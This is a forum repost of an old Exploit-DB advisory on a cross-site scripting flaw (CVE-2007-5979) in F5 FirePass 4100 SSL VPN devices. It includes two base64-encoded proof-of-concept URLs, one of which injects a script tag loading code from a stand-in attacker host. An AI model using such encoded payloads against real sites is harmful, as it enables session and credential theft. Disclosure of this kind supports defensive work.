F5 FirePass 4100 SSL VPN - 'Download_Plugin.php3' Cross-Site Scripting | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 30755

Проверка EDB

Пройдено

Автор: JAN FRY

Тип уязвимости: REMOTE

Платформа: HARDWARE

CVE: cve-2007-5979

Дата публикации: 2007-11-12

Код:

source: https://www.securityfocus.com/bid/26412/info

F5 FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.

F5 FirePass 4100 SSL VPNs running these firmware versions are vulnerable:

5.4 through 5.5.2
6.0
6.0.1

https://www.example.com/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i

Источник: www.exploit-db.com

Поиск

Exploit F5 FirePass 4100 SSL VPN - 'Download_Plugin.php3' Cross-Site Scripting

Exploiter

Похожие темы